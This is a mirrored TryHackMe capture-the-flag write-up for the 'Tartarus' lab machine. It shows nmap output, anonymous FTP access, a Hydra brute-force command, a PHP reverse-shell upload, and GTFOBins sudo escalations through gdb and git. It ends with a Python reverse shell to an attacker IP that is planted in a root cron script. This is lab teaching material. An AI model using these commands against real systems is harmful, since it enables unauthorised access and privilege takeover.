Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-10 14:44:20 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/TryHackMe/Tartarus.md
AbdullahRizwan101 44e27e7d07
Add files via upload
2020-09-21 12:15:51 -04:00

224 lines
No EOL
6.4 KiB
Markdown
Raw Blame History

# TryHackMe-Tartarus Remastered
>Abdullah Rizwan | 21st September , 06:57 PM
## NMAP
```
Nmap scan report for 10.10.164.74
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 17 Jul 05 21:45 test.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.94.60
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 98:6c:7f:49:db:54:cb:36:6d:d5:ff:75:42:4c:a7:e0 (RSA)
| 256 0c:7b:1a:9c:ed:4b:29:f5:3e:be:1c:9a:e4:4c:07:2c (ECDSA)
|_ 256 50:09:9f:c0:67:3e:89:93:b0:c9:85:f1:93:89:50:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.06 seconds
```
## PORT 80
`http://10.10.164.74/robots.txt`.
We can find robots.txt file from where we can see `/admin-dir` is accessible and there are possible usernames and passwords
## FTP (Port 21)
Since Anonymous FTP login is allowed we can use that to see what's in `www-data`'s directory.
```
ftp 10.10.164.74
Connected to 10.10.164.74.
220 (vsFTPd 3.0.3)
Name (10.10.164.74:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ...
-rw-r--r-- 1 ftp ftp 17 Jul 05 21:45 test.txt
226 Directory send OK.
ftp>
```
We can use `get test.txt` to save it locally on our machine.
This was the content of `test.txt`
`vsftpd test file`
But there is another directory which you can miss because it's named as `...`
```
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
drwxr-xr-x 2 ftp ftp 4096 Jul 05 21:31 ...
226 Directory send OK.
ftp> cd ...
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jul 05 21:31 .
drwxr-xr-x 3 ftp ftp 4096 Jul 05 21:31 ..
-rw-r--r-- 1 ftp ftp 14 Jul 05 21:45 yougotgoodeyes.txt
226 Directory send OK.
```
This is the content of `yougotgoodeyes.txt` which is a directory for the webpage.
`/sUp3r-s3cr3t`
## Hydra
```
hydra -L users -P passwords.txt 10.10.164.74 http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-21 10:35:30
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1313 login tries (l:13/p:101), ~83 tries per task
[DATA] attacking http-post-form://10.10.164.74:80/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect
[80][http-post-form] host: 10.10.164.74 login: enox password: P@ssword1234
```
After getting authenticated we are now shown an upload from where we could upload a php reverse shell
## Reverse Shell
Getting a reverse shell first setup netcat listener for any port you want as long as it is not being used
`nc -lvp 5555`
Then get reverse shell from pentest monkey : https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
In the php file change `$ip` and `$port` variable to you connected VPN IP and port on which you have set your netcat.
Upload it and execute it from here :
`http://10.10.164.74/sUp3r-s3cr3t/images/uploads/`
Just an extra step if you want you can stabilize shell using this technique so that you can use clear command or auto tab complete
```
1. python -c "import pty;pty.spawn('/bin/bash')";
2. ctrl+z
3. stty raw -echo
4. fg and then press enter 2 times.
```
You can then find user flag in `d4rckh` directory.
User flag : `0f7dbb2243e692e3ad222bc4eff8521f`
## Privilege Escalation
### thirtytwo
We can find SUID files with `find / -perm /4000` and we find `/var/www/gdb`
Then `sudo -l` we can see user `thirtytwo` can run gdb so visiting GTFOBINS we find this one liner which escalates us to user.
`sudo -u thirtytwo /var/www/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit`
Then again check for `sudo -l`
```
thirtytwo@ubuntu-xenial:/home/d4rckh$ sudo -l
Matching Defaults entries for thirtytwo on ubuntu-xenial:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User thirtytwo may run the following commands on ubuntu-xenial:
(d4rckh) NOPASSWD: /usr/bin/git
```
We can see d4rchk can run `git` so let's try to escalate throguh `git`.
### d4rchk
1. sudo -u d4rchk git -p help config
2. !/bin/sh
```
$ whoami
d4rckh
```
### Root
`/home/d4rchk` has a file named `clean.py` we can see append the contents for python reverse shell then wait for a moment because this is running as a cron job.
```
d4rckh@ubuntu-xenial:/home/d4rckh$ nano cleanup.py
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.8.94.60",9999))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```
Setting up again a netcat listener.
```
nc -lvp 9999
listening on [any] 9999 ...
10.10.164.74: inverse host lookup failed: Unknown host
connect to [10.8.94.60] from (UNKNOWN) [10.10.164.74] 53654
/bin/sh: 0: can't access tty; job control turned off
#
```
Reference in a new issue View git blame Copy permalink